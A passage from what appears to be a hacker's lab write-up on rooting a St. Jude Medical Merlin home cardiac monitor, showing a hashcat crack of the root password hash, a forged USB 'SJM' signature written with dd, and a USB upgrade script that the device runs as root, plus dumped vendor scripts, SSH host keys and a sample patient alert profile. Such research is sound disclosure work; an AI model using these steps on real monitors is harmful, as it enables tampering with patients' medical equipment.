cat: /etc/shadow: No such file or directory</pre>

Lets break this.

<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a
hashcat (v3.5.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU

OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Precompute-Final-Permutation
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>

0q8h1Maw1oYAU:mah1200

Session..........: sjm_hash
Status...........: Cracked
Hash.Type........: descrypt, DES (Unix), Traditional DES
Hash.Target......: 0q8h1Maw1oYAU
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)
Guess.Mask.......: ?a?a?a?a?a?a?a [7]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4764729344/69833729609375 (0.01%)
Rejected.........: 0/4764729344 (0.00%)
Restore.Point....: 0/81450625 (0.00%)
Candidates.#1....: ;~9anan -> $sb~{ka
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16

Started: Sun May 07 17:39:51 2017
Stopped: Sun May 07 17:40:05 2017</pre>

Attempts to login as root fail, what was going on with that operator user?

<pre>operator:*:12:0:operator:/root:</pre>

Lets set the password to "test" and attempt logging in.

<pre>sh-2.05a# grep "operator" /etc/passwd
operator:dPUvQFLH8...A:12:0:operator:/root:</pre>

<pre>[SJM_CONFIGURATION]
VERSION=EX2000 v6.1B PR_6.56
(none) login: root
Password:
Login incorrect
2017-05-14
(none) login: operator
Password:
operator@(none):~$ whoami
operator
operator@(none):~$ su root
Password:
PAM_unix[266]: (su) session opened for user root by (uid=12)
root@(none):~# whoami
root
root@(none):~# </pre>

== Taking Things Further ==

Lets look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.

<pre>#!/bin/bash
#
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke
# this script only if the attached USB device is a mass-storage device.
# hotplug does this by looking at the device class of the attached usb device
# See /etc/hotplug/usb.usermap. The device class for mass storage devices
# is ______
#
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to
# find the scsi ID of the attached USB storage device. It then goes on to
# find the device node corresponding to this scsi ID.
#
# version 1.1 - Added USB signature check functionality
#
# For the new cellular adapters - viz mobidata and velocity, ignore the
# mass storage interface reported. Please see comments at the top of
# /etc/hotplug/usb/velocity for details.
#
# - Ashok Iyer (16-Jun-2010)
#

export PATH=/usr/bin:/usr/local/bin:$PATH

MOUNT_PATH="/mnt/sjmpendrives"
MOUNT_NUMBER=1
LOG_FILE="/tmp/usbstorage.log"
SGMAP="sg_map"

# The functions in this script rely on "echo" to pass information to each
# other. If you need to modify this script, do not use "echo" for debugging.
# Instead use the feedback()/error_exit() functions below. These will log
# information to a log file and do not interfere with information passing
# between functions.

***snip***

function check_sign {
local node1=$1"1"
feedback "Checking signature ... "
feedback "node1 = $node1"
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501
signature=`cat /tmp/.sign`

if [ "$signature" = "SJM" ]; then
feedback "Valid pendrive"
echo 0
else
feedback "Invalid pendrive"
echo -1
fi
}

***snip***

# We only mount the first partition of a USB storage device. There is no
# requirement to mount multiple partitions. Makes the job easy :-)
function mount_scsi_dev {
local scsi_dev=$1
local mountpt=""

# check if the first partition of the device is mounted
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]"
then
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"

# FIXME- Ugly hack to detect partitions on USB flash drive
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline
# or fix devfs once and for all.
# There is another problem in devfs that after the USB flash disk is removed
# the corresponding devfs partitions (part1, part2 etc...) still show up.
foobar=`ls -l $scsi_dev | awk '{print $11}'`
dd if=/dev/$foobar of=/dev/null bs=1 count=1

# Checking USB signature
ret=`check_sign $scsi_dev`
if [ $ret -eq 0 ]; then
feedback "Valid pendrive"
else
# Tanto: Inform the Exec App to show
# an Invalid Media Error
if [ -p /tmp/remoteInt.pipe ]; then
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe
error_exit "Invalid pendrive"
else
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"
fi
fi

feedback "Mounting $scsi_dev"1" on $mountpt"
mount -t auto $scsi_dev"1" $mountpt
if [ "$?" -eq 0 ]; then
feedback "$scsi_dev"1" is now mounted on $mountpt"
feedback "Launch application specific script"
sh /etc/launch_appln.sh $mountpt
else
feedback "Mount error for $scsi_dev"
fi
else
feedback "Ignoring $scsi_dev - already mounted"
fi
}

# Find and mount all attached USB storage devices
function mount_all_attached {
local scsiuniqid=""
feedback "Find and mount all attached usb storage devices"

for scsiuniqid in $(allusb_scsiuniqid)
do
local scsidev="`diskdev_from_uniqid $scsiuniqid`"
if [ "$scsidev" == "UNKNOWN" ]; then
sleep 1
fi
mount_scsi_dev $scsidev
done
}

***snip***

# The remover script will be invoked when the device is removed. This is
# useless in a way because umount will have no effect. The only benefit is
# that the "mount" command will not show stale entries.

# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive
# which is removed ( unlike umounting all attached USB flash drives )
feedback "REM = $REMOVER"
if [ -f $REMOVER ]; then
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER
else
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER
fi

# Inform the Export data script when pendrive is unplugged.
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER
chmod a+x $REMOVER

mount_all_attached</pre>

Lets look inside of /etc/launch_appln.sh

<pre>#!/bin/sh

if [ $# -ne 1 ]; then
echo "usage: ./launch_appln.sh /mnt/pendrive"
exit
fi

# FIXME
# This script may be invoked by hotplug
# Do not run the script if it is already running
# updater or data export

mountpt=$1
script_path=/apps/tanto/

if [ -f $mountpt/version.ini ]; then
# call updater script
echo "Launching updater script"
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1
umount /mnt/sjmpendrives/1
umount /mnt/pendrive
else
umount /mnt/sjmpendrives/1
umount /mnt/pendrive
exit 0
fi
else
# Call Data export script
echo "Launching export data script"
sh $script_path/export_data.sh $mountpt
umount /mnt/sjmpendrives/1
umount /mnt/pendrive
fi</pre>

It looks like their pendrive "signature" is fairly easy to get around.

<pre>rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501
3+0 records in
3+0 records out
3 bytes copied, 0.00116472 s, 2.6 kB/s
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign
00000000 00 00 00 |...|
00000003
rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod
00000000 53 4a 4d |SJM|
00000003
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501
3+0 records in
3+0 records out
3 bytes copied, 0.00700994 s, 0.4 kB/s
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501
3+0 records in
3+0 records out
3 bytes copied, 0.00123249 s, 2.4 kB/s
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign
00000000 53 4a 4d |SJM|
00000003</pre>

Adding the required files to the drive and a small script.

<pre>rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR
.:
total 36K
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini

./etc:
total 24K
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d

./etc/init.d:
total 24K
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh

rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh
#!/bin/sh
function led_off {
for i in `seq 0 7`;
do
ledControl -l$i -b0
sleep 0.05
done
}

function led_dim {
for i in `seq 0 7`;
do
ledControl -l$i -b1
sleep 0.05
done
}

function led_bright {
for i in `seq 0 7`;
do
ledControl -l$i -b2
sleep 0.05
done
}

function party_mode {
counter=0
while [ $counter -lt $1 ];
do
led_off
sleep 0.05
led_dim
sleep 0.05
led_bright
sleep 0.05
let counter=counter+1
done
}

/etc/init.d/tantoapp stop
#cp /mnt/sjmpendrives/1/passwd /etc/passwd
echo "This worked!" > /root/diditwork.txt
if [ -f /root/diditwork.txt ];
then
party_mode 15
else
echo "It did not work..."
fi</pre>

This is the output that we get from the console.

<pre>operator@(none):~$ su root
Password:
PAM_unix[265]: (su) session opened for user root by (uid=12)
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2
scsi0 : SCSI emulation for USB Mass Storage devices
Vendor: Lexar Model: USB Flash Drive Rev: 1100
Type: Direct-Access ANSI SCSI revision: 02
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)
sda: Write Protect is off
Partition check:
/dev/scsi/host0/bus0/target0/lun0: p1
modprobe: Can't locate module /dev/sg1
modprobe: Can't locate module /dev/sg2
modprobe: Can't locate module /dev/sg3
modprobe: Can't locate module /dev/sg4
modprobe: Can't locate module /dev/sg5
modprobe: Can't locate module /dev/sdb
modprobe: Can't locate module /dev/sdc
modprobe: Can't locate module /dev/sdd
modprobe: Can't locate module /dev/sde
modprobe: Can't locate module /dev/sdf
modprobe: modprobe: Can't locate module nls_cp437
modprobe: modprobe: Can't locate module nls_iso8859-1
modprobe: modprobe: Can't locate module nls_iso8859-1
modprobe: modprobe: Can't locate module nls_iso8859-1
ls /root
devel_install.sh diditwork.txt setdev.sh setlog.sh
root@(none):~# cat /root/diditwork.txt
This worked!
root@(none):~# cat /tmp/usbstorage.log
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002
REM = /var/run/usb/%proc%bus%usb%001%002
Find and mount all attached usb storage devices
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)
Use sgmap to match 0:0:0:0.
Waiting for device id to appear...
SCSI disk for 0:0:0:0 is /dev/sda
Checking /mnt/sjmpendrives/1
Mountpoint /mnt/sjmpendrives/1 is free
Checking signature ...
node1 = /dev/sda1
Valid pendrive
Valid pendrive
Mounting /dev/sda1 on /mnt/sjmpendrives/1
/dev/sda1 is now mounted on /mnt/sjmpendrives/1
Launch application specific script</pre>

== Party Mode Demo ==
{{#ev:youtube|cNcGebu8NRs}}

== Other Stuff to Look Into ==

I doubt this device has been updated to the latest firmware as I aquired it still wrapped in its packaging. As of January 2017 St. Jude Medical claims that a security patch has been applied to the newer firmware releases.

Below are some interesting things that were found.

DSA keys and known hosts.
<pre>root@(none):~# cd /root/.ssh
root@(none):~/.ssh# ls -lah
drwx------ 2 root root 0 Jan 10 2013 .
drwxrwxr-x 3 root root 0 May 15 00:10 ..
-rw------- 1 root root 668 Nov 28 2012 id_dsa
-rw-r--r-- 1 root root 601 Nov 28 2012 id_dsa.pub
-rw-r--r-- 1 root root 719 Nov 28 2012 known_hosts
root@(none):~/.ssh# cat known_hosts
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtfdoYdn5D/vsC4Pm25jBUXDzfXrj6O50O32UONPOnvKcb08acULYcx1bDyeRGcMBqKwEJdPUKdwAT2evf4jYVSa4JvDAHQWJo15s2igWO04veEYitV5i0NEqVs+vRTJAqM70iCIKkhtoGkjBBnJcntw6u/8vgKXkvqBx85WBULc=
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29HEmKtQ5RABmAWmZ3MdyO+wiQ1GGzuNneGnPPL8KF+SYLjHXaQViB32cibA9dSauMpb8zcwj7YSxtKfu4K1gcH5vUOsqW9BgDsZYv7zWk2OHb8vLs+NT083+YbzjZvr7oGz+1/TAzfXORsN9Gf+BQMsHyjiHOjVJ/vEIy2fp0E=
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyDjGfUubwy0y0KJw459g2L17DK4K4QAIZSvcW8hupVNK/3IrP9HSXetS69czyLISFfewq6a4ippvsbh5i+fb2C2vhHmW4N1U3zKa6vcKzUEd6j6NwUefunbSP8XBXaMoqSuN2l3nbfEeUIaVDuSk9m6uP/rVcGVQHZokPVDdpP8=</pre>

Dev scripts in /root/
<pre>root@(none):~# ls -lah /root
drwxrwxr-x 3 root root 0 May 15 00:10 .
drwxr-xr-x 20 root root 0 Jan 1 1970 ..
-rw-r--r-- 1 root root 446 Jan 1 1970 .bash_history
-rw-r--r-- 1 root root 52 Apr 24 2008 .bash_profile
drwx------ 2 root root 0 Jan 10 2013 .ssh
-r-xr-xr-x 1 root root 3.0k Nov 28 2012 devel_install.sh
-r-xr-xr-x 1 root root 483 Nov 28 2012 setdev.sh
-r-xr-xr-x 1 root root 267 Nov 28 2012 setlog.sh

root@(none):~# cat setdev.sh
#!/bin/sh

if [ $# -ne 1 ]; then
echo "usage: ./setdev.sh [1|0]"
exit
fi

if [ $1 -eq 1 ]; then
sed '1,$s/DEVELOPMENT $.*= .*$0/DEVELOPMENT \11/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf
elif [ $1 -eq 0 ]; then
sed '1,$s/DEVELOPMENT $.*= .*$1/DEVELOPMENT \10/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf
else
echo "Invalid argument"
fi

root@(none):~# cat setlog.sh
#!/bin/sh

if [ $# -ne 1 ]; then
echo "usage: ./setlog.sh [1|0]"
exit
fi

if [ $1 -eq 1 ]; then
touch /data/config/.tantolog
touch /data/config/.dcllog
elif [ $1 -eq 0 ]; then
rm /data/config/.tantolog
rm /data/config/.dcllog
else
echo "Invalid argument"
fi

root@(none):~# cat devel_install.sh
#!/bin/sh
#
# Script to download the devel package via scp from ftp.pacesetter.com
# Username: REDACTED_USER. The script will prompt for a password which the
# user has to enter.
#
# Version 0.1 - Ashok Iyer (aiyer at sjm dot com)

# Setup the PATH. Don't assume we get a sane one
export PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin

# IP address of the server from which we download the devel package using scp.
SERVER="10.16.155.27"

function download_package()
{
# Download the devel package and the md5sum.txt file
echo -e "\n==> Downloading $1 package using wget.\n"

wget ftp://REDACTED_USER:REDACTED_PASSWORD@10.16.155.27/$2/$1

if [ "$?" != 0 ]; then
echo "scp failed..."
exit 1
fi
}

/root/setdev.sh 1
/etc/init.d/tantoapp stop

if [ ! -f /etc/password_key ]; then
touch /etc/password_key
fi

echo "-----------------------------------------------------"
echo "This script will install the development package"
echo "This contains the following:"

echo " 1. gdbserver"
echo " 2. ssh server"
echo " 3. procps (contains vmstat and top)"
echo " 4. dos2unix and unix2dos"
echo " 5. ftp client"
echo " 6. mtd utilities (for diagnostics)"
echo " 7. less utility"
echo " 8. traceroute"
echo " 9. agentd"
echo " 10. monitord"
echo "-----------------------------------------------------"

sleep 2

# Test if the server is reachable
echo
echo "---- Testing server connectivity ----"
sleep 2
ping -c 3 -w 10 $SERVER

if [ "$?" != 0 ]; then
echo
echo "--- $SERVER not reachable. ---"
echo " Will try connecting anyway (some firewalls block ping requests)".
echo " Contact your network administrator if the connection fails"
sleep 2
else
echo
echo "--- Server reachable. Good! ---"
echo
fi

TMPDIR="$HOME/devel$$"
mkdir $TMPDIR

if [ "$?" != 0 ]; then
echo "unable to create temporary directory. Check if you have write"
echo "permissions in $HOME"
fi

cd $TMPDIR
# Download the development packages
echo
echo "+----------------------------------------------+"
echo "| Downloading development packages using wget. |"
echo "+----------------------------------------------+"
echo

download_package "devel-util_1.4_all.ipk" "not-so-advanced/utils/devel_packages/"

echo
echo "+---------------------------------------+"
echo "| Installing the development utilities. |"
echo "+---------------------------------------+"
echo
# The package is sane. Install it
ipkg-cl -d root install *.ipk

if [ "$?" != 0 ]; then
echo "Package installation failed"
exit 1
fi

echo
echo "+-------------------------------------------+"
echo "| Performing required config modifications. |"
echo "+-------------------------------------------+"
echo

sed '1,$s/AUTOKEYGEN=no/AUTOKEYGEN=yes/g' /etc/default/ssh > /tmp/ssh
cp -a /tmp/ssh /etc/default/ssh

echo
echo "+-------------------------------------------+"
echo "| Starting SSH Daemon . |"
echo "+-------------------------------------------+"
echo

/etc/init.d/ssh start

echo
echo "Devel package successfully installed"

cd $HOME

# delete TMPDIR
rm -rf $TMPDIR

exit 0</pre>

Sample patient profile
<pre><?xml version="1.0" encoding="UTF-8"?>
<profile:ProfileList xmlns:profile="http://www.merlin.net/PayloadProfile.xsd">
<SystemData>
<SystemInformation DeviceModel="XXXX-XX" DeviceSerialNumber="XXXXXX" NumberOfProfiles="7" PatientNotifyWindowEnd="23:00:00" PatientNotifyWindowStart="16:00:00" ProfileDate="2011-09-07" ProfileVersion="7" SchemaVersion="A" TransmitterModelNumber="EX1150" TransmitterProfileID="100899" TransmitterRequestType="PProfile" TransmitterSerialNumber="00000000" UTCServerTime="22:57:29"/>
<Controls>
<Switch name="ADETECT_DIALUP_NUM" value="Enable"/>
<Switch name="UNPAIRED_MODE" value="Disable"/>
<Switch name="ENROLLMENT_CHANGE" value="Disable"/>
<Switch name="PROFILE_SYNC_PREF" value="Enable"/>
<iSwitch name="ALLWD_UNSCHED_EVENTS" value="100"/>
<iSwitch name="NOTIFY_DELAY_ALERT" value="24"/>
<iSwitch name="NOTIFY_DELAY_FLP" value="96"/>
<iSwitch name="NOTIFY_DELAY_MED" value="0"/>
<iSwitch name="NOTIFY_DELAY_SERVER" value="0"/>
<tSwitch name="CLINIC_TYPE" value="UNKNOWN"/>
<tSwitch name="SHORT_BTN_ACTION" value="FLP"/>
<tSwitch name="LONG_BTN_ACTION" value="DCHK"/>
<tSwitch name="MERLIN_ID" value="512556937"/>
<tSwitch name="UPDATED_DEVICE_MODEL" value="1111-11"/>
<tSwitch name="UPDATED_DEVICE_SERIAL" value="999999"/>
<tSwitch name="SCHED_REF_TIME" value="2001-01-01_00-00-00"/>
<tSwitch name="VOL_CTRL_PREF" value="OFF"/>
</Controls>
</SystemData>
<PayloadProfile Type="Follow-up">
<GenerateSchedule GS_DateOfEvent="2011-09-08" GS_TimeOfEvent="09:00:00"/>
<Controls>
<Switch name="GDC2_SCHED_FLP_PREF" value="Enable"/>
<Switch name="UNSCHED_FLP_PREF" value="Enable"/>
<Switch name="SCHED_FLP_PREF" value="Disable"/>
<Switch name="CLEAR_EPIS_FLAG" value="Enable"/>
<Switch name="CLEAR_ST_FLAG" value="Disable"/>
<Switch name="CLEAR_DIAG_FLAG" value="Enable"/>
<Switch name="CLEAR_SEGM_FLAG" value="Enable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Device_Check">
<GenerateSchedule GS_Interval="24" GS_TimeOfEvent="09:00:00"/>
<Controls>
<Switch name="UNSCH_DCHK_PREF" value="Enable"/>
<Switch name="SCHED_DCHK_PREF" value="Disable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Alert_Controls">
<Controls>
<Switch name="HIGH_VRATE_EPISODE_ALERT" value="Disable"/>
<Switch name="V_AUTOCAP_ALERT" value="Disable"/>
<Switch name="ACAP_CONFIRM_ALERT" value="Disable"/>
<Switch name="RVCAP_CONFIRM_ALERT" value="Disable"/>
<Switch name="LVCAP_CONFIRM_ALERT" value="Disable"/>
<Switch name="HIGH_VRATE_EPISODE_NOT" value="Disable"/>
<Switch name="V_AUTOCAP_NOT" value="Disable"/>
<Switch name="ACAP_CONFIRM_NOT" value="Disable"/>
<Switch name="RVCAP_CONFIRM_NOT" value="Disable"/>
<Switch name="LVCAP_CONFIRM_NOT" value="Disable"/>
<Switch name="CONG_MON_ALERT" value="Enable"/>
<Switch name="DEV_IN_MRI_MODE_ALERT" value="Disable"/>
<Switch name="DEV_RST_MRI_MODE_ALERT" value="Disable"/>
<Switch name="EARLY_DEPLETION_DETECTED_ALERT" value="Enable"/>
<Switch name="PER_BIV_PACING_ALERT" value="Disable"/>
<Switch name="PER_RV_PACING_ALERT" value="Enable"/>
<Switch name="CONG_MON_NOT" value="Disable"/>
<Switch name="DEV_IN_MRI_MODE_NOT" value="Disable"/>
<Switch name="DEV_RST_MRI_MODE_NOT" value="Disable"/>
<Switch name="EARLY_DEPLETION_DETECTED_NOT" value="Disable"/>
<Switch name="PER_BIV_PACING_NOT" value="Disable"/>
<Switch name="PER_RV_PACING_NOT" value="Disable"/>
<Switch name="LFDA_TIMEOUT_ALERT" value="Enable"/>
<Switch name="ST_TYPE_2_ALERT" value="Enable"/>
<Switch name="VT_VF_3_PER_DAY_ALERT" value="Enable"/>
<Switch name="THERAPY_EXHAUSTED_ALERT" value="Enable"/>
<Switch name="HV_THERAPY_UNSUC_ALERT" value="Enable"/>
<Switch name="VT_VF_OCCURED_ALERT" value="Enable"/>
<Switch name="LFDA_TIMEOUT_NOT" value="Disable"/>
<Switch name="ST_TYPE_2_NOT" value="Disable"/>
<Switch name="VT_VF_3_PER_DAY_NOT" value="Disable"/>
<Switch name="THERAPY_EXHAUSTED_NOT" value="Disable"/>
<Switch name="HV_THERAPY_UNSUC_NOT" value="Disable"/>
<Switch name="VT_VF_OCCURED_NOT" value="Disable"/>
<Switch name="LFDA_NSLN_ALERT" value="Enable"/>
<Switch name="LFDA_RV_NOISE_ALERT" value="Enable"/>
<Switch name="ST_TYPE_1_ALERT" value="Enable"/>
<Switch name="LFDA_NSLN_NOT" value="Disable"/>
<Switch name="LFDA_RV_NOISE_NOT" value="Disable"/>
<Switch name="ST_TYPE_1_NOT" value="Enable"/>
<Switch name="AIMP_OOR_ALERT" value="Disable"/>
<Switch name="CCRG_LMT_ALERT" value="Enable"/>
<Switch name="DEV_EOS_ALERT" value="Disable"/>
<Switch name="DEV_ERI_ALERT" value="Enable"/>
<Switch name="DEV_EVVI_ALERT" value="Enable"/>
<Switch name="DEV_RST_ALERT" value="Enable"/>
<Switch name="HVIMP_OOR_ALERT" value="Enable"/>
<Switch name="HW_BVVI_ALERT" value="Enable"/>
<Switch name="LVIMP_OOR_ALERT" value="Disable"/>
<Switch name="OCD_ALERT" value="Enable"/>
<Switch name="SOSD_ALERT" value="Enable"/>
<Switch name="RVIMP_OOR_ALERT" value="Enable"/>
<Switch name="TTRPY_DIS_ALERT" value="Enable"/>
<Switch name="ATAF_DUR_ALERT" value="Disable"/>
<Switch name="ATAF_WK_DUR_ALERT" value="Disable"/>
<Switch name="ATAF_VRATE_ALERT" value="Disable"/>
<Switch name="ATP_RX_SUCCESS_ALERT" value="Enable"/>
<Switch name="HV_TRPY_ALERT" value="Enable"/>
<Switch name="PERCENT_BIV_THRESHOLD_ALERT" value="Disable"/>
<Switch name="PERCENT_RV_THRESHOLD_ALERT" value="Disable"/>
<Switch name="ST_MAJOR_EPISODE_ALERT" value="Disable"/>
<Switch name="TRPY_ACCEL_ALERT" value="Enable"/>
<Switch name="NOISE_REV_ALERT" value="Disable"/>
<Switch name="NSVT_EPIS_ALERT" value="Disable"/>
<Switch name="NSVF_EPIS_ALERT" value="Disable"/>
<Switch name="SPARE_1_ALERT" value="Disable"/>
<Switch name="SPARE_2_ALERT" value="Disable"/>
<Switch name="SPARE_3_ALERT" value="Disable"/>
<Switch name="SPARE_4_ALERT" value="Disable"/>
<Switch name="SPARE_5_ALERT" value="Disable"/>
<Switch name="AIMP_OOR_NOT" value="Disable"/>
<Switch name="CCRG_LMT_NOT" value="Disable"/>
<Switch name="DEV_EOS_NOT" value="Disable"/>
<Switch name="DEV_ERI_NOT" value="Disable"/>
<Switch name="DEV_EVVI_NOT" value="Disable"/>
<Switch name="DEV_RST_NOT" value="Disable"/>
<Switch name="HVIMP_OOR_NOT" value="Disable"/>
<Switch name="HW_BVVI_NOT" value="Disable"/>
<Switch name="LVIMP_OOR_NOT" value="Disable"/>
<Switch name="OCD_NOT" value="Disable"/>
<Switch name="SOSD_NOT" value="Disable"/>
<Switch name="RVIMP_OOR_NOT" value="Disable"/>
<Switch name="TTRPY_DIS_NOT" value="Disable"/>
<Switch name="ATAF_DUR_NOT" value="Disable"/>
<Switch name="ATAF_WK_DUR_NOT" value="Disable"/>
<Switch name="ATAF_VRATE_NOT" value="Disable"/>
<Switch name="ATP_RX_SUCCESS_NOT" value="Disable"/>
<Switch name="HV_TRPY_NOT" value="Disable"/>
<Switch name="PERCENT_BIV_THRESHOLD_NOT" value="Disable"/>
<Switch name="PERCENT_RV_THRESHOLD_NOT" value="Disable"/>
<Switch name="ST_MAJOR_EPISODE_NOT" value="Disable"/>
<Switch name="TRPY_ACCEL_NOT" value="Disable"/>
<Switch name="NOISE_REV_NOT" value="Disable"/>
<Switch name="NSVT_EPIS_NOT" value="Disable"/>
<Switch name="NSVF_EPIS_NOT" value="Disable"/>
<Switch name="SPARE_1_NOT" value="Disable"/>
<Switch name="SPARE_2_NOT" value="Disable"/>
<Switch name="SPARE_3_NOT" value="Disable"/>
<Switch name="SPARE_4_NOT" value="Disable"/>
<Switch name="SPARE_5_NOT" value="Disable"/>
<iSwitch name="BIV_PACING_DURATION" value="7"/>
<iSwitch name="RV_PACING_DURATION" value="7"/>
<iSwitch name="ALERT_MASK_DURATION" value="4000"/>
<iSwitch name="PERCENT_BIV_PACING" value="100"/>
<iSwitch name="PERCENT_RV_PACING" value="100"/>

</Controls>
</PayloadProfile>
<PayloadProfile Type="GDC">
<GenerateSchedule GS_Interval="1440"/>
<UploadSchedule US_Interval="168"/>
<Controls>
<Switch name="SCHED_GDC_PREF" value="Disable"/>
<Switch name="CLEAR_GDC_FLAG" value="Enable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Maintenance">
<UploadSchedule US_Interval="168"/>
<Controls>
<Switch name="MAINT_REBOOT_PREF" value="Disable"/>
<Switch name="MAINT_PREF" value="Enable"/>
<Switch name="RF_STAT_COLLECT" value="Disable"/>
<Switch name="STAT_DATA_UPLD_PREF" value="Enable"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="MED">
<GenerateSchedule GS_Interval="24"/>
<UploadSchedule US_Interval="7"/>
<Controls>
<Switch name="SCHED_MED_PREF" value="Enable"/>
<Switch name="SCHED_MED_WINDOW_PREF" value="Enable"/>
<iSwitch name="ACTIVE_MED_SCHEDULES" value="1"/>
<tSwitch name="MED_SCHEDULE_1" value="1100"/>
<tSwitch name="MED_SCHEDULE_2" value="0500"/>
</Controls>
</PayloadProfile>
<PayloadProfile Type="Spare">
<GenerateSchedule GS_DateOfEvent="2000-01-01" GS_Interval="0" GS_TimeOfEvent="08:00:00" GS_UnscheduledEvent="Disable" GS_WeeklyEvent="Sunday"/>
<UploadSchedule US_DateOfEvent="2000-01-01" US_Interval="0" US_TimeOfEvent="08:00:00" US_UnscheduledEvent="Disable" US_WeeklyEvent="Sunday"/>
<Controls>
<Switch name="SPARE_FLAG1" value="Disable"/>
<Switch name="SPARE_FLAG2" value="Enable"/>
<Switch name="SPARE_FLAG3" value="Disable"/>
<Switch name="SPARE_FLAG4" value="Disable"/>
<Switch name="SPARE_FLAG5" value="Disable"/>
<Switch name="SPARE_FLAG6" value="Disable"/>
<Switch name="SPARE_FLAG7" value="Disable"/>
<Switch name="SPARE_FLAG8" value="Disable"/>
<Switch name="SPARE_FLAG9" value="Disable"/>
<Switch name="SPARE_FLAG10" value="Disable"/>
<iSwitch name="SPARE_INTEGER1" value="0"/>
<iSwitch name="SPARE_INTEGER2" value="0"/>
<iSwitch name="SPARE_INTEGER3" value="0"/>
<iSwitch name="SPARE_INTEGER4" value="0"/>
<iSwitch name="SPARE_INTEGER5" value="0"/>
<iSwitch name="SPARE_INTEGER6" value="0"/>
<iSwitch name="SPARE_INTEGER7" value="0"/>
<iSwitch name="SPARE_INTEGER8" value="0"/>
<iSwitch name="SPARE_INTEGER9" value="0"/>
<iSwitch name="SPARE_INTEGER10" value="0"/>
<rSwitch name="SPARE_REAL4" value="0.0"/>
<rSwitch name="SPARE_REAL5" value="0.0"/>
